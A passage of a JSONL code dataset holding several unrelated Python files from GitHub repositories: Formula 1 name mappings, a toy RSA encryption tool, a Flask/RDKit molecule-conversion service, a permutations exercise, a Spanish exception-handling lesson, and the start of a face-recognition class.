'Helmut Niedermayr',\r\n 'klenk' : 'Hans Klenk',\r\n 'balsa' : 'Marcel Balsa',\r\n 'schoeller' : 'Rudolf Schoeller',\r\n 'pietsch' : 'Paul Pietsch',\r\n 'peters' : 'Josef Peters',\r\n 'lof' : 'Dries van der Lof',\r\n 'flinterman' : 'Jan Flinterman',\r\n 'dusio' : 'Piero Dusio',\r\n 'crespo' : 'Alberto 
Crespo',\r\n 'rol' : 'Franco Rol',\r\n 'sanesi' : 'Consalvo Sanesi',\r\n 'guy_mairesse' : 'Guy Mairesse',\r\n 'louveau' : 'Henri Louveau',\r\n 'wallard' : 'Lee Wallard',\r\n 'forberg' : 'Carl Forberg',\r\n 'rose' : 'Mauri Rose',\r\n 'mackey' : 'Bill Mackey',\r\n 'green' : 'Cecil Green',\r\n 'walt_brown' : 'Walt Brown',\r\n 'hellings' : 'Mack Hellings',\r\n 'levegh' : 'Pierre Levegh',\r\n 'chaboud' : 'Eugene Chaboud',\r\n 'gordini' : 'Aldo Gordini',\r\n 'kelly' : 'Joe Kelly',\r\n 'parker' : 'Philip Fotheringham-Parker',\r\n 'shawe_taylor' : 'Brian Shawe Taylor',\r\n 'john_james' : 'John James',\r\n 'branca' : 'Toni Branca',\r\n 'richardson' : 'Ken Richardson',\r\n 'jover' : 'Juan Jover',\r\n 'grignard' : 'Georges Grignard',\r\n 'hampshire' : 'David Hampshire',\r\n 'crossley' : 'Geoff Crossley',\r\n 'fagioli' : 'Luigi Fagioli',\r\n 'harrison' : 'Cuth Harrison',\r\n 'fry' : 'Joe Fry',\r\n 'martin' : 'Eugene Martin',\r\n 'leslie_johnson' : 'Leslie Johnson',\r\n 'biondetti' : 'Clemente Biondetti',\r\n 'pian' : 'Alfredo Pian',\r\n 'sommer' : 'Raymond Sommer',\r\n 'chitwood' : 'Joie Chitwood',\r\n 'fohr' : 'Myron Fohr',\r\n 'ader' : 'Walt Ader',\r\n 'holmes' : 'Jackie Holmes',\r\n 'levrett' : 'Bayliss Levrett',\r\n 'jackson' : 'Jimmy Jackson',\r\n 'pagani' : 'Nello Pagani',\r\n 'pozzi' : 'Charles Pozzi',\r\n 'serafini' : 'Dorino Serafini',\r\n 'cantrell' : 'Bill Cantrell',\r\n 'mantz' : 'Johnny Mantz',\r\n 'kladis' : 'Danny Kladis',\r\n 'oscar_gonzalez' : 'Oscar Gonzalez',\r\n 'hulkenberg' : 'Nico Hulkenberg',\r\n 'petrov' : 'Vitaly Petrov',\r\n 'lopez' : 'Jose Maria Lopez',\r\n 'grassi' : 'Lucas di Grassi',\r\n 'bruno_senna' : 'Bruno Senna',\r\n 'chandhok' : 'Karun Chandhok',\r\n 'maldonado' : 'Pastor Maldonado',\r\n 'resta' : 'Paul di Resta',\r\n 'perez' : 'Sergio Perez',\r\n 'ambrosio' : 'Jerome d\\'Ambrosio',\r\n 'ricciardo' : 'Daniel Ricciardo',\r\n 'vergne' : 'Jean-Eric Vergne',\r\n 'pic' : 'Charles Pic',\r\n 'chilton' : 'Max Chilton',\r\n 'gutierrez' : 'Esteban Gutierrez',\r\n 'bottas' : 'Valtteri Bottas',\r\n 'garde' : 'Giedo van der Garde',\r\n 'jules_bianchi' : 'Jules Bianchi',\r\n 'kevin_magnussen' : 'Kevin Magnussen',\r\n 'kvyat' : 'Daniil Kvyat',\r\n 'lotterer' : 'Andre Lotterer',\r\n 'ericsson' : 'Marcus Ericsson',\r\n 'stevens' : 'Will Stevens',\r\n 'max_verstappen' : 'Max Verstappen',\r\n 'nasr' : 'Felipe Nasr',\r\n 'sainz' : 'Carlos Sainz',\r\n 'merhi' : 'Roberto Merhi',\r\n 'rossi' : 'Alexander Rossi',\r\n 'jolyon_palmer' : 'Jolyon Palmer',\r\n 'wehrlein' : 'Pascal Wehrlein',\r\n 'haryanto' : 'Rio Haryanto',\r\n 'vandoorne' : 'Stoffel Vandoorne',\r\n 'ocon' : 'Esteban Ocon',\r\n 'leclerc' : 'Charles Leclerc',\r\n 'gasly' : 'Pierre Gasly',\r\n 'norris' : 'Lando Norris',\r\n 'giovinazzi' : 'Antonio Giovinazzi',\r\n 'latifi' : 'Nicholas Latifi',\r\n 'albon' : 'Alexander Albon',\r\n 'russell' : 'George Russell',\r\n 'stroll' : 'Lance Stroll',\r\n 'tsunoda' : 'Yuki Tsunoda',\r\n 'mick_schumacher' : 'Mick Schumacher',\r\n 'mazepin' : 'Nikita Mazepin'\r\n }\r\n\r\nconstuctor_mapping = {'mclaren' : 'McLaren',\r\n 'bmw_sauber' : 'BMW Sauber',\r\n 'williams' : 'Williams',\r\n 'renault' : 'Renault',\r\n 'toro_rosso' : 'Toro Rosso',\r\n 'ferrari' : 'Ferrari',\r\n 'toyota' : 'Toyota',\r\n 'super_aguri' : 'Super Aguri',\r\n 'red_bull' : 'Red Bull',\r\n 'force_india' : 'Force India',\r\n 'honda' : 'Honda',\r\n 'spyker' : 'Spyker',\r\n 'mf1' : 'MF1',\r\n 'spyker_mf1' : 'Spyker MF1',\r\n 'sauber' : 'Sauber',\r\n 'bar' : 'BAR',\r\n 'jordan' : 'Jordan',\r\n 'minardi' : 'Minardi',\r\n 'jaguar' : 
'Jaguar',\r\n 'prost' : 'Prost',\r\n 'arrows' : 'Arrows',\r\n 'benetton' : 'Benetton',\r\n 'brawn' : 'Brawn',\r\n 'stewart' : 'Stewart',\r\n 'tyrrell' : 'Tyrrell',\r\n 'lola' : 'Lola',\r\n 'ligier' : 'Ligier',\r\n 'forti' : 'Forti',\r\n 'footwork' : 'Footwork',\r\n 'pacific' : 'Pacific',\r\n 'simtek' : 'Simtek',\r\n 'team_lotus' : 'Team Lotus',\r\n 'larrousse' : 'Larrousse',\r\n 'brabham' : 'Brabham',\r\n 'dallara' : 'Dallara',\r\n 'fondmetal' : 'Fondmetal',\r\n 'march' : 'March',\r\n 'moda' : 'Andrea Moda',\r\n 'ags' : 'AGS',\r\n 'lambo' : 'Lambo',\r\n 'leyton' : 'Leyton House',\r\n 'coloni' : 'Coloni',\r\n 'eurobrun' : 'Euro Brun',\r\n 'osella' : 'Osella',\r\n 'onyx' : 'Onyx',\r\n 'life' : 'Life',\r\n 'rial' : 'Rial',\r\n 'zakspeed' : 'Zakspeed',\r\n 'ram' : 'RAM',\r\n 'alfa' : 'Alfa Romeo',\r\n 'spirit' : 'Spirit',\r\n 'toleman' : 'Toleman',\r\n 'ats' : 'ATS',\r\n 'theodore' : 'Theodore',\r\n 'fittipaldi' : 'Fittipaldi',\r\n 'ensign' : 'Ensign',\r\n 'shadow' : 'Shadow',\r\n 'wolf' : 'Wolf',\r\n 'merzario' : 'Merzario',\r\n 'kauhsen' : 'Kauhsen',\r\n 'rebaque' : 'Rebaque',\r\n 'surtees' : 'Surtees',\r\n 'hesketh' : 'Hesketh',\r\n 'martini' : 'Martini',\r\n 'brm' : 'BRM',\r\n 'penske' : 'Penske',\r\n 'lec' : 'LEC',\r\n 'mcguire' : 'McGuire',\r\n 'boro' : 'Boro',\r\n 'apollon' : 'Apollon',\r\n 'kojima' : 'Kojima',\r\n 'parnelli' : 'Parnelli',\r\n 'maki' : 'Maki',\r\n 'hill' : 'Embassy Hill',\r\n 'lyncar' : 'Lyncar',\r\n 'trojan' : 'Trojan',\r\n 'amon' : 'Amon',\r\n 'token' : 'Token',\r\n 'iso_marlboro' : 'Iso Marlboro',\r\n 'tecno' : 'Tecno',\r\n 'matra' : 'Matra',\r\n 'politoys' : 'Politoys',\r\n 'connew' : 'Connew',\r\n 'bellasi' : 'Bellasi',\r\n 'tomaso' : 'De Tomaso',\r\n 'cooper' : 'Cooper',\r\n 'eagle' : 'Eagle',\r\n 'lds' : 'LDS',\r\n 'protos' : 'Protos',\r\n 'shannon' : 'Shannon',\r\n 'scirocco' : 'Scirocco',\r\n 're' : 'RE',\r\n 'brp' : 'BRP',\r\n 'porsche' : 'Porsche',\r\n 'derrington' : 'Derrington',\r\n 'gilby' : 'Gilby',\r\n 'stebro' : 'Stebro',\r\n 'emeryson' : 'Emeryson',\r\n 'enb' : 'ENB',\r\n 'jbw' : 'JBW',\r\n 'ferguson' : 'Ferguson',\r\n 'mbm' : 'MBM',\r\n 'behra-porsche' : 'Behra-Porsche',\r\n 'maserati' : 'Maserati',\r\n 'scarab' : 'Scarab',\r\n 'watson' : 'Watson',\r\n 'epperly' : 'Epperly',\r\n 'phillips' : 'Phillips',\r\n 'lesovsky' : 'Lesovsky',\r\n 'trevis' : 'Trevis',\r\n 'meskowski' : 'Meskowski',\r\n 'kurtis_kraft' : 'Kurtis Kraft',\r\n 'kuzma' : 'Kuzma',\r\n 'christensen' : 'Christensen',\r\n 'ewing' : 'Ewing',\r\n 'aston_martin' : 'Aston Martin',\r\n 'vanwall' : 'Vanwall',\r\n 'moore' : 'Moore',\r\n 'dunn' : 'Dunn',\r\n 'elder' : 'Elder',\r\n 'sutton' : 'Sutton',\r\n 'fry' : 'Fry',\r\n 'tec-mec' : 'Tec-Mec',\r\n 'connaught' : 'Connaught',\r\n 'alta' : 'Alta',\r\n 'osca' : 'OSCA',\r\n 'gordini' : 'Gordini',\r\n 'stevens' : 'Stevens',\r\n 'bugatti' : 'Bugatti',\r\n 'mercedes' : 'Mercedes',\r\n 'lancia' : 'Lancia',\r\n 'hwm' : 'HWM',\r\n 'schroeder' : 'Schroeder',\r\n 'pawl' : 'Pawl',\r\n 'pankratz' : 'Pankratz',\r\n 'arzani-volpini' : 'Arzani-Volpini',\r\n 'nichels' : 'Nichels',\r\n 'bromme' : 'Bromme',\r\n 'klenk' : 'Klenk',\r\n 'simca' : 'Simca',\r\n 'turner' : 'Turner',\r\n 'del_roy' : 'Del Roy',\r\n 'veritas' : 'Veritas',\r\n 'bmw' : 'BMW',\r\n 'emw' : 'EMW',\r\n 'afm' : 'AFM',\r\n 'frazer_nash' : 'Frazer Nash',\r\n 'sherman' : 'Sherman',\r\n 'deidt' : 'Deidt',\r\n 'era' : 'ERA',\r\n 'butterworth' : 'Aston Butterworth',\r\n 'cisitalia' : 'Cisitalia',\r\n 'lago' : 'Talbot-Lago',\r\n 'hall' : 'Hall',\r\n 'marchese' : 'Marchese',\r\n 'langley' : 'Langley',\r\n 
'rae' : 'Rae',\r\n 'olson' : 'Olson',\r\n 'wetteroth' : 'Wetteroth',\r\n 'adams' : 'Adams',\r\n 'snowberger' : 'Snowberger',\r\n 'milano' : 'Milano',\r\n 'hrt' : 'HRT',\r\n 'virgin' : 'Virgin',\r\n 'cooper-maserati' : 'Cooper-Maserati',\r\n 'cooper-osca' : 'Cooper-OSCA',\r\n 'cooper-borgward' : 'Cooper-Borgward',\r\n 'cooper-climax' : 'Cooper-Climax',\r\n 'cooper-castellotti' : 'Cooper-Castellotti',\r\n 'lotus-climax' : 'Lotus-Climax',\r\n 'lotus-maserati' : 'Lotus-Maserati',\r\n 'de_tomaso-osca' : 'De Tomaso-Osca',\r\n 'de_tomaso-alfa_romeo' : 'De Tomaso-Alfa Romeo',\r\n 'lotus-brm' : 'Lotus-BRM',\r\n 'lotus-borgward' : 'Lotus-Borgward',\r\n 'cooper-alfa_romeo' : 'Cooper-Alfa Romeo',\r\n 'de_tomaso-ferrari' : 'De Tomaso-Ferrari',\r\n 'lotus-ford' : 'Lotus-Ford',\r\n 'brabham-brm' : 'Brabham-BRM',\r\n 'brabham-ford' : 'Brabham-Ford',\r\n 'brabham-climax' : 'Brabham-Climax',\r\n 'lds-climax' : 'LDS-Climax',\r\n 'lds-alfa_romeo' : 'LDS-Alfa Romeo',\r\n 'cooper-ford' : 'Cooper-Ford',\r\n 'mclaren-ford' : 'McLaren-Ford',\r\n 'mclaren-seren' : 'McLaren-Serenissima',\r\n 'eagle-climax' : 'Eagle-Climax',\r\n 'eagle-weslake' : 'Eagle-Weslake',\r\n 'brabham-repco' : 'Brabham-Repco',\r\n 'cooper-ferrari' : 'Cooper-Ferrari',\r\n 'cooper-ats' : 'Cooper-ATS',\r\n 'mclaren-brm' : 'McLaren-BRM',\r\n 'cooper-brm' : 'Cooper-BRM',\r\n 'matra-ford' : 'Matra-Ford',\r\n 'brm-ford' : 'BRM-Ford',\r\n 'mclaren-alfa_romeo' : 'McLaren-Alfa Romeo',\r\n 'march-alfa_romeo' : 'March-Alfa Romeo',\r\n 'march-ford' : 'March-Ford',\r\n 'lotus-pw' : 'Lotus-Pratt & Whitney',\r\n 'shadow-ford' : 'Shadow-Ford',\r\n 'shadow-matra' : 'Shadow-Matra',\r\n 'brabham-alfa_romeo' : 'Brabham-Alfa Romeo',\r\n 'lotus_racing' : 'Lotus',\r\n 'marussia' : 'Marussia',\r\n 'caterham' : 'Caterham',\r\n 'lotus_f1' : 'Lotus F1',\r\n 'manor' : 'Manor Marussia',\r\n 'haas' : 'Haas F1 Team',\r\n 'alphatauri' : 'AlphaTauri',\r\n 'aston_martin' : \"Aston Martin\",\r\n 'alpine' : 'Alpine',\r\n 'racing_point' : 'Racing Point'\r\n }\r\n\r\nfinishing_statuses = {'disqualified' : 'disqualification',\r\n 'accident' : 'an accident',\r\n 'collision' : 'a collision',\r\n 'engine' : 'an engine problem',\r\n 'gearbox' : 'a gearbox problem',\r\n 'transmission' : 'a transmission issue',\r\n 'clutch' : 'a clutch issue',\r\n 'hydraulics' : 'a hydraulics problem',\r\n 'electrical' : 'an electrical problem',\r\n 'spun off' : 'spinning off',\r\n 'radiator' : 'a radiator issue',\r\n 'suspension' : 'a suspension problem',\r\n 'brakes' : 'a brakes problem',\r\n 'differential' : 'a differential issue',\r\n 'overheating' : 'an overheating issue',\r\n 'mechanical' : 'a mechanical problem',\r\n 'tyre' : 'a tyre issue',\r\n 'driver seat' : 'a driver seat issue',\r\n 'puncture' : 'a puncture',\r\n 'driveshaft' : 'a driveshaft problem',\r\n 'retired' : 'unknown reasons',\r\n 'fuel pressure' : 'a fuel pressure problem',\r\n 'front wing' : 'a front wing issue',\r\n 'water pressure' : 'a water pressure problem',\r\n 'refuelling' : 'a refuelling problem',\r\n 'wheel' : 'a wheel glitch',\r\n 'throttle' : 'a throttle problem',\r\n 'steering' : 'a steering issue',\r\n 'technical' : 'a technical problem',\r\n 'electronics' : 'an electronics problem',\r\n 'broken wing' : 'a broken wing',\r\n 'heat shield fire' : 'a heat shield fire problem',\r\n 'exhaust' : 'an exhaust issue',\r\n 'oil leak' : 'an oil leak',\r\n 'wheel rim' : 'a wheel rim problem',\r\n 'water leak' : 'a water leak',\r\n 'fuel pump' : 'a fuel pump issue',\r\n 'track rod' : 'a track rod issue',\r\n 'oil pressure' : 'an oil 
pressure problem',\r\n 'withdrew' : 'withdrawal',\r\n 'engine fire' : 'an engine fire',\r\n 'tyre puncture' : 'a tyre puncture',\r\n 'out of fuel' : 'running out of fuel',\r\n 'wheel nut' : 'a wheel nut problem',\r\n 'not classified' : 'not being classified',\r\n 'pneumatics' : 'a pneumatics problem',\r\n 'handling' : 'a handling problem',\r\n 'rear wing' : 'a rear wing issue',\r\n 'fire' : 'a fire',\r\n 'wheel bearing' : 'a wheel bearing problem',\r\n 'physical' : 'a physical problem',\r\n 'fuel system' : 'a fuel system issue',\r\n 'oil line' : 'an oil line issue',\r\n 'fuel rig' : 'a fuel rig issue',\r\n 'launch control' : 'a launch control issue',\r\n 'injured' : 'an injury',\r\n 'fuel' : 'a fuel problem',\r\n 'power loss' : 'a power loss problem',\r\n 'vibrations' : 'increased vibrations',\r\n '107% rule' : 'the 107% rule',\r\n 'safety' : 'a safety problem',\r\n 'drivetrain' : 'a drivetrain problem',\r\n 'ignition' : 'an ignition issue',\r\n 'did not qualify' : 'not qualifying',\r\n 'injury' : 'an injury',\r\n 'chassis' : 'a chassis issue',\r\n 'battery' : 'a battery issue',\r\n 'stalled' : 'a stalled engine',\r\n 'halfshaft' : 'a halfshaft issue',\r\n 'crankshaft' : 'a crankshaft problem',\r\n 'safety concerns' : 'safety concerns',\r\n 'not restarted' : 'not restarting',\r\n 'alternator' : 'an alternator problem',\r\n 'underweight' : 'being underweight',\r\n 'safety belt' : 'a safety belt issue',\r\n 'oil pump' : 'an oil pump issue',\r\n 'fuel leak' : 'a fuel leak problem',\r\n 'excluded' : 'being excluded',\r\n 'did not prequalify' : 'not prequalifying',\r\n 'injection' : 'an injection issue',\r\n 'distributor' : 'a distributor issue',\r\n 'driver unwell' : 'being unwell',\r\n 'turbo' : 'a turbo problem',\r\n 'cv joint' : 'a cv joint problem',\r\n 'water pump' : 'a water pump problem',\r\n 'fatal accident' : 'a fatal accident',\r\n 'spark plugs' : 'a spark plug issue',\r\n 'fuel pipe' : 'a fuel pipe problem',\r\n 'eye injury' : 'an eye injury',\r\n 'oil pipe' : 'an oil pipe problem',\r\n 'axle' : 'an axle issue',\r\n 'water pipe' : 'a water pipe issue',\r\n 'magneto' : 'a magneto issue',\r\n 'supercharger' : 'a supercharger problem',\r\n 'engine misfire' : 'engine misfiring',\r\n 'collision damage' : 'collision damage',\r\n 'power unit' : 'a power unit issue',\r\n 'ers' : 'an ers problem',\r\n 'brake duct' : 'a brake duct issue',\r\n\r\n }","repo_name":"ZX10Tomcat/f1ChatBot","sub_path":"mappings.py","file_name":"mappings.py","file_ext":"py","file_size_in_byte":54243,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19665835385","text":"#NTLO\nclass RSA_System:\n\n def __init__(self, primes):\n self.p, self.q = primes[0], primes[1]\n self.n = primes[0] * primes[1]\n self.phi = (self.p - 1) * (self.q - 1)\n\n def display(self):\n print('New RSA scheme created:')\n print('Primes: ' + str(self.p) + ', ' + str(self.q))\n print('Modulus: ' + str(self.n))\n print('Phi(n): ' + str(self.phi))\n print('Public exponent: ' + str(self.b) + '\\nPrivate exponent: ' + str(self.a))\n\n def Encrypt(self, msg):\n unreduced_e = msg ** self.b\n e = unreduced_e % self.n\n\n return e\n\n def Decrypt(self, msg, a):\n unreduced_d = msg ** a\n d = unreduced_d % self.n\n\n return d\n \n def EEA(self, b):\n #print(\"Running EEA\")\n\n q_list = []\n\n o = self.phi\n m = b\n \n #r_vals = []\n t_i = 0\n t_ii = 1\n \n reduce = True\n while(reduce):\n #r_vals.append(m)\n q = int(o / m)\n t_new = t_i - t_ii*q\n t_i = t_ii\n t_ii = t_new\n \n holder = m\n 
m = o % m\n o = holder\n\n if((o % m) == 0):\n reduce = False\n\n #print(\"GCD: \" + str(m))\n #print(t_ii)\n #print(r_vals)\n\n if(m == 1):\n #print(\"Valid b\")\n self.b = b\n #GENERATE A\n\n a = t_ii\n \n if(a < 0):\n a = a + self.phi\n \n #prod = a * b\n #print(prod % self.phi)\n\n self.a = a\n\n return True\n else:\n print(\"Entered number not relatively prime to \" + str(self.phi))\n return False\n \n\n\nclass SimulatedScheme:\n\n def __init__(self, specs):\n self.n = specs['modulus']\n try:\n self.b = specs['public exponent']\n except:\n pass\n \n \n def Encrypt(self, msg):\n unreduced_e = msg ** self.b\n e = unreduced_e % self.n\n \n return e\n\n def Decrypt(self, msg, a):\n unreduced_d = msg ** a\n d = unreduced_d % self.n\n\n return d\n \n\n\n\n\ndef createSystem():\n \n primes = getPrimes()\n\n cryptosystem = RSA_System(primes)\n\n getExponents(cryptosystem)\n \n #print(primes)\n #print(n)\n\n return cryptosystem\n\n\n\ndef getExponents(s):\n\n b_str = input('\\nEnter a relatively prime integer, mod ' + str(s.phi) + ', for an encryption exponent:\\n')\n\n try:\n b = int(b_str)\n\n valid_b = s.EEA(b)\n\n if not valid_b:\n getExponents(s)\n \n except:\n print('Invalid value entered for b.')\n getExponents(s)\n \n\n\ndef getPrimes():\n primes = input('Enter values for prime numbers p,q:\\n')\n\n primes = primes.split()\n\n p_list = []\n for i in primes:\n try:\n new_p = int(i)\n #ADD PRIMALITY TEST\n prime = testPrimality(new_p)\n if(prime):\n p_list.append(new_p)\n else:\n print(\"Composite integer entered.\")\n p_list = getPrimes()\n break\n \n except:\n print('Non-numerical value entered.')\n\n p_list = getPrimes()\n\n return p_list\n\n\ndef useScheme(cs, mode):\n #mode = input('Encrypt or decrypt a new integer (E or D)\\n')\n #print(\"\\n\")\n\n if(mode == \"E\"):\n plaintext = input('\\nEnter plaintext integer to be encrypted: ')\n try:\n msg = int(plaintext)\n encryptedmsg = cs.Encrypt(msg)\n\n print('Encrypted form of message: ' + str(encryptedmsg))\n except:\n print('Invalid plaintext entered. Try again.')\n useScheme(cs, mode)\n elif(mode == \"D\"):\n e_plaintext = input('\\nEnter encrypted message to be decrypted: ')\n try:\n e_msg = int(e_plaintext)\n\n a = getInt(\"private exponent\")\n \n msg = cs.Decrypt(e_msg, a)\n\n print('Decrypted form of message: ' + str(msg))\n except:\n print('Invalid plaintext entered. Try again.')\n useScheme(cs, mode)\n \n\n\ndef getRSASpecs(m):\n print(\"\\nEnter specifications of RSA system\")\n\n if(m == \"E\"):\n specs = {'modulus': 0, 'public exponent': 1}\n elif(m == \"D\"):\n specs = {'modulus': 0}\n \n for t in specs.keys():\n newEntry = getInt(t)\n specs[t] = newEntry\n\n print(\"System instantiated.\")\n return specs\n\n\ndef getInt(title):\n\n int_str = input(\"Enter integer value for \" + title + \": \")\n\n int_rtrn = 0\n try:\n int_rtrn = int(int_str)\n except:\n print(\"Invalid entry value\")\n\n return int_rtrn\n\n\ndef testPrimality(n):\n\n isPrime = True\n\n sq = int(n**0.5)\n\n for i in range(2, (sq+1)):\n\n fac = n / i\n if(fac == int(fac) and fac != 1):\n isPrime = False\n break\n\n return isPrime\n\n\n\ndef run():\n r = input(\"Select a mode: G - generate, E - encrypt, D - decrypt. \\n\")\n #print(\"\\n\")\n \n if(r.upper() == \"G\"):\n print(\"Generating new RSA cryptosystem... 
\\n\")\n cs = createSystem()\n print(\"\\n\")\n\n cs.display()\n \n elif(r.upper() == \"E\" or r.upper() == \"D\"):\n #print(\"\\n\")\n specs = getRSASpecs(r.upper())\n\n sim = SimulatedScheme(specs)\n\n useScheme(sim, r.upper())\n\n print(\"\\n\\n\")\n \n run()\n\n \n\nrun()\n\n\n\n#cs = RSA_system([7, 13])\n#cs.EEA(11)\n\n","repo_name":"EnCue/rsa-app","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9829320500","text":"from flask import Flask, render_template, request, send_from_directory, redirect, url_for, jsonify\nfrom flask_cors import CORS, cross_origin\nimport os\napp = Flask(__name__, static_url_path='/static')\n#app.config[\"CORS_HEADERS\"] = \"Content-Type\"\n#pip install -U flask-cors and use to allow AJAX cross-origin request support\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\nfrom rdkit import Chem\n\nhomeRoute = \"/fragview\"\n\n@app.route(homeRoute+'/', methods=['GET'])\n#@cross_origin()\ndef root():\n #return render_template('index.html')\n return render_template('index.html')\n\n#This code lines solve 404 NOT FOUND issues related to JSmol files\n#WARNING: send_static_file is a security concern with user input\n#Maybe needs to find other ways later or we don't need this once our app runs on server.\n@app.route('/<path:path>')\n#@cross_origin()\ndef static_file(path):\n return app.send_static_file(path)\n\n\n@app.route(homeRoute+'/2d', methods=['POST'])\n#@cross_origin()\ndef two_dimensional():\n content = request.get_json() \n smiles = content['smiles']\n\n if not smiles:\n return jsonify({ \"error\": \"No smiles provided\" }), 400\n \n #print(smiles)\n output = []\n for s in smiles:\n m = Chem.MolFromSmiles(s)\n if m:\n output.append(Chem.MolToMolBlock(m))\n else:\n return jsonify({ \"error\": f\"Unable to generate mol from smile: {s}\" }), 400\n\n return jsonify({ \"output\": output })\n\n@app.route(homeRoute+'/2dSingle', methods=[\"POST\"])\ndef single_two_dimensional():\n content = request.get_json()\n smile = content['smile']\n\n if(smile.find('.') and len(smile.split('.')) > 30):\n return jsonify({ \"error\": \"No more than 30 fragments can be parsed at a single time\" }), 400\n\n output = []\n\n if(smile):\n m = Chem.MolFromSmiles(smile)\n if m:\n output.append(Chem.MolToMolBlock(m))\n else:\n return jsonify({ \"error\": f\"Unable to generate mol from smile: {smile}\" }), 400\n else:\n return jsonify({ \"error\": \"No smiles provided\" }), 400\n return jsonify({ \"output\": output })\n\n@app.route(homeRoute+'/2dInchi', methods=[\"POST\"])\ndef inchi_two_dimensional():\n content = request.get_json()\n inchi = content[\"inchi\"]\n output = []\n if(inchi):\n molecule = Chem.MolFromInchi(inchi)\n if(molecule):\n output.append(Chem.MolToMolBlock(molecule))\n output.append(Chem.MolToSmiles(molecule))\n else:\n return jsonify({ \"error\": f\"Unable to generate mol from inchi: {inchi}\" }), 400\n # if(inchi.find('.')):\n # if(len(inchi.split('.')) <= 30):\n # smiles = []\n # for frag in inchi.split('.'):\n # if(\"InChI\" in frag):\n # molecule = Chem.MolFromInchi(frag)\n # smiles.append(Chem.MolToSmiles(molecule))\n # #frag is actually a smile and not InChI\n # else:\n # smiles.append(frag)\n # smile = '.'.join(smiles)\n # molecule = Chem.MolFromSmiles(smile)\n # output.append(Chem.MolToMolBlock(molecule))\n # output.append(smile)\n # return jsonify({ \"output\": output })\n # else:\n # return jsonify({ \"error\": 
\"No more than 30 fragments can be parsed at a single time\" }), 400\n # else: \n # molecule = Chem.MolFromInchi(inchi)\n # if(molecule):\n # output.append(Chem.MolToMolBlock(molecule))\n # output.append(Chem.MolToSmiles(molecule))\n # else:\n # return jsonify({ \"error\": f\"Unable to generate mol from inchi: {inchi}\" }), 400\n else:\n return jsonify({ \"error\": \"No inchi provided\" }), 400\n return jsonify({ \"output\": output })\n\n@app.route(homeRoute+'/2dMol')\ndef two_dimensionalMol():\n smile = request.args.get('smile', 0, str)\n if(len(smile) > 0):\n if(smile.find('.') != -1):\n smile = smile.split('.')\n molFiles = {}\n i = 0\n for smle in smile:\n m = Chem.MolFromSmiles(smle)\n mol_string = Chem.MolToMolBlock(m)\n molFiles['mol' + str(i)] = mol_string\n i += 1\n #Return a JSONified object, not a list\n return(jsonify(mol2D=molFiles), 200, {'Content-Type': 'text/plain'})\n\n@app.route(homeRoute+'/licenses')\ndef loadLicense():\n return render_template('licenses.html')\n\n@app.route(homeRoute+'/terms')\ndef loadTerms():\n return render_template('terms.html')\n\n@app.route(homeRoute+'/manual')\ndef loadManual():\n return render_template('manual.html')\n\nif(__name__ == \"__main__\"):\n app.run(host='0.0.0.0')\n\n# @app.route('/favicon.ico')\n# def faviconRet():\n# print(os.path.join(app.root_path, 'static/img'))\n# return send_from_directory(os.path.join(app.root_path, 'static/img'), 'favicon-32x32.png')\n \n\n #m = Chem.MolFromSmiles(smile)\n #mol_string = Chem.MolToMolBlock(m)\n #return mol_string, 200, {'Content-Type': 'text/plain'}\n","repo_name":"SpencerArnold2/FragView","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5684186586","text":"import itertools\n\n\ndef solution(data):\n result = []\n prev = []\n\n def dfs(elements):\n # elements의 len이 0이면 순환 종료.\n if len(elements) == 0:\n result.append(prev[:])\n # 요소를 하나하나 추가시킴.\n for e in elements:\n # ele 복사\n next = elements[:]\n # next에서 e를 빼고 prev에 넣음.\n next.remove(e)\n prev.append(e)\n # 순환호출\n dfs(next)\n # 순환호출이 끝나면 prev를 pop시켜 다음 작업 준비.\n prev.pop()\n\n dfs(data)\n return result\n\n\ndef solution2(data):\n return list(map(list, itertools.permutations(data)))\n\n\nif __name__ == \"__main__\":\n print(solution([1, 2, 3]))\n print(solution2([1, 2, 3]))\n","repo_name":"Leekm0912/codingTest","sub_path":"그래프/순열.py","file_name":"순열.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73426913448","text":"def division(a,b):\n try:\n resultado = a/b\n print(resultado)\n except ZeroDivisionError:\n print('Error! No se puede realizar la division por 0')\n\ndef division_excepciones(a):\n try:\n divisor = input('Ingrese el divisor: ')\n resultado = a/divisor\n print(resultado)\n except TypeError:\n print('Error! no se puede operar int con str')\n except ValueError:\n print('Error! Debe ingresar un formato numerico')\n except ZeroDivisionError:\n print('Error! 
No se puede realizar la division por 0')\n\n#SIN Excepcion\ndef division_sin_excp(a,b):\n return a/b\n\ndef main():\n #a = 20/0\n #n= int(input('Ingrese un numero: '))\n #print('hola')\n # division(10,0)\n # division(10,2)\n #division_excepciones(10)\n\n # try:\n # print(division_sin_excp(10,0))\n # except Exception as e:\n # print('Algo raro paso',e)\n\n while True:\n try:\n total = 0\n sumandos = input('Ingresa numeros separados por espacios: ')\n sumandos = sumandos.split()\n for num in sumandos:\n if num.isnumeric():\n total += float(num)\n else:\n raise ValueError('El valor ingresado no es numerico')\n except ValueError as e:\n print(e)\n print('Vuelva a ingresar los numeros: ')\n else:\n print(f'La suma es: {total}')\n break\n finally:\n print('Ha terminado el proceso, se vimos!')\n \n print('Fin del main')\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"broko-de/22818-Django-MaterialClases","sub_path":"Clase5/claseFullstackEjemplos/excepciones.py","file_name":"excepciones.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"es","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"34839713858","text":"import numpy as np\nimport pickle\n\nclass FaceRecognizer():\n\n DESCRIPTORS = \"face_descriptors.npy\"\n LABELS = \"labels.pickle\"\n\n def __init__(self):\n print(\"Retrieving recognition database...\")\n self.descriptors = np.load(FaceRecognizer.DESCRIPTORS)\n # will be loaded as a 1D array, so needs to be\n # reshaped back into a n x 128 arrary\n self.descriptors = self.descriptors.reshape (-1,128)\n f = open(FaceRecognizer.LABELS, 'rb')\n self.labels = pickle.load(f) # in 